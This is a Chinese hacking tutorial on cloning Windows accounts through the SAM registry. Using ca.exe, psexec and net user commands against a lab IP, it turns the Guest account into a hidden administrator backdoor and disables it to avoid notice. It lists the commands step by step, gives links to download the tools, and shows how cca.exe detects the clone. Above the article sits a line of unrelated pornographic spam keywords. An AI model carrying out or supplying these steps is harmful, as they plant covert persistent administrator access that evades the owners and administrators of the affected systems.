欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

使用CA和CCA克隆賬戶與檢查賬號(hào)是否被克隆工具的方法

  發(fā)布時(shí)間:2011-05-01 01:01:40   作者:佚名   我要評(píng)論
克隆帳號(hào)的原理簡(jiǎn)單的說(shuō)是這樣:在注冊(cè)表中有兩處保存了帳號(hào)的SID相對(duì)標(biāo)志符,一處是SAM\Domains\Account\Users下的子鍵名,另一處是該子鍵的子項(xiàng)F的值中。
【原理基礎(chǔ)】

  克隆帳號(hào)的原理簡(jiǎn)單的說(shuō)是這樣:在注冊(cè)表中有兩處保存了帳號(hào)的SID相對(duì)標(biāo)志符,一處是SAM\Domains\Account\Users下的子鍵名,另一處是該子鍵的子項(xiàng)F的值中。這里微軟犯了個(gè)不同步它們的錯(cuò)誤,登陸時(shí)用的是后者,查詢時(shí)用的是前者。當(dāng)用admin的F項(xiàng)覆蓋其他帳號(hào)的F項(xiàng)后,就造成了帳號(hào)是管理員權(quán)限但查詢還是原來(lái)狀態(tài)的情況。即所謂的克隆帳號(hào)。

  注:ca和cca需要目標(biāo)開(kāi)放ipc$,請(qǐng)確認(rèn)可以與目標(biāo)建立ipc$。

  ca.exe 是一個(gè)基于windows系統(tǒng)的遠(yuǎn)程克隆賬號(hào)工具。

  cca.exe 檢查系統(tǒng)是否有克隆賬號(hào)。psexec是一個(gè)遠(yuǎn)程執(zhí)行工具,你可以像使用telnet一樣使用它。

  【實(shí)驗(yàn)環(huán)境】

  工作平臺(tái):Windows XP操作系統(tǒng)

  服務(wù)平臺(tái):Virtual PC Windows 2003

  輔助平臺(tái):Virtual PC Windows XP(遠(yuǎn)程測(cè)試)

  軟件:ca.exe(下載地址:http://www.sans.org.cn/Soft/294.html )

  cca.exe (下載地址:http://www.sans.org.cn/Soft/295.html )

  psexec.exe(下載地址:http://www.sans.org.cn/Soft/296.html )

  【跟我操作】

  下載并運(yùn)行所用的軟件。CA和CCA及psexec都是在命令行下運(yùn)行的工具,需要通過(guò)“開(kāi)始”->“運(yùn)行”輸入“CMD”切換到其目錄才可以運(yùn)行。

  CA克隆帳號(hào)

  1、首先需要獲取遠(yuǎn)程主機(jī)/服務(wù)器的管理員權(quán)限,假設(shè)我們已得到目標(biāo)主機(jī)的管理權(quán)限,目標(biāo)主機(jī)的用戶名為:Administrator,密碼為:123456

  2、在MS-DOS中鍵入命令:ca \\192.168.0.230 Administrator “123456” guest 123456

  該命令表示IP地址為 192.168.0.230的遠(yuǎn)程主機(jī)中,將guest賬號(hào)克隆成管理員權(quán)限的賬號(hào),克隆后的guest帳戶密碼為123456如圖1所示:

  
黑客技術(shù)


  圖1 進(jìn)行帳號(hào)克隆

  當(dāng)命令執(zhí)行后,如果得到類似下圖中的回顯,則說(shuō)明克隆賬號(hào)成功。從回顯中我們還可以得知克隆賬號(hào)的處理過(guò)程如圖2所示:

  
黑客技術(shù)


  圖2 帳號(hào)克隆過(guò)程

  為了讓“后門賬號(hào)”更加隱蔽。不會(huì)被管理員輕易發(fā)現(xiàn),還需要把該Guest賬號(hào)禁用,這樣一來(lái),便可以在以后的入侵過(guò)程中使用該被進(jìn)制的Guest賬號(hào)實(shí)現(xiàn)遠(yuǎn)程控制了。過(guò)程:首先在本地MS-DOS中鍵入“psexec \\192.168.0.230 –u Administrator –p “123456” cmd.exe”獲得遠(yuǎn)程主機(jī)的命令行,然后在得到的命令行中鍵入net user guest /active:no命令來(lái)禁用Guest賬號(hào)過(guò)程如圖3所示:

  
黑客技術(shù)


  圖3 禁用guest帳號(hào)

  使用CCA查看帳號(hào)是否被克隆

  在上面的步驟中已經(jīng)成功的把Administrator的權(quán)限成功的克隆到了Guest賬號(hào)上了,下面就來(lái)驗(yàn)證這一克隆賬號(hào)的結(jié)果,我們使用與CA配套的工具CCA來(lái)驗(yàn)證。過(guò)程如下:

  在MS-DOS中鍵入:cca \\192.168.0.230 Administrator 123456 命令查看遠(yuǎn)程主機(jī)192.168.0.230上的Administrator賬號(hào)是否被克隆,輸入后按回車鍵執(zhí)行,如圖4所示:

  
黑客技術(shù)


  圖4 使用CCA查看帳號(hào)是否被克隆

  從上圖回顯中[Guest] AS SAME AS [Administrator]可知Administrator賬號(hào)已經(jīng)被Guest克隆。

  為了進(jìn)一步說(shuō)明后門賬號(hào)已經(jīng)克隆成功,下面通過(guò)psexec.exe來(lái)驗(yàn)證Gues賬號(hào)是否具有管理員權(quán)限,在MS-DOS中鍵入命令:psexec \\192.168.0.230 –u guest –p 123456 cmd.exe 后回車執(zhí)行。成功獲得遠(yuǎn)程主機(jī)/服務(wù)器的命令行如圖:

  
黑客技術(shù)


  圖5 檢測(cè)guest帳號(hào)的可用性

  由此可見(jiàn)該被禁用的Guest賬號(hào)可以用來(lái)實(shí)現(xiàn)遠(yuǎn)程登陸。這樣我們就成功的完成了用戶賬戶的克隆,而且,與原正好具有相同的權(quán)限。  

相關(guān)文章

最新評(píng)論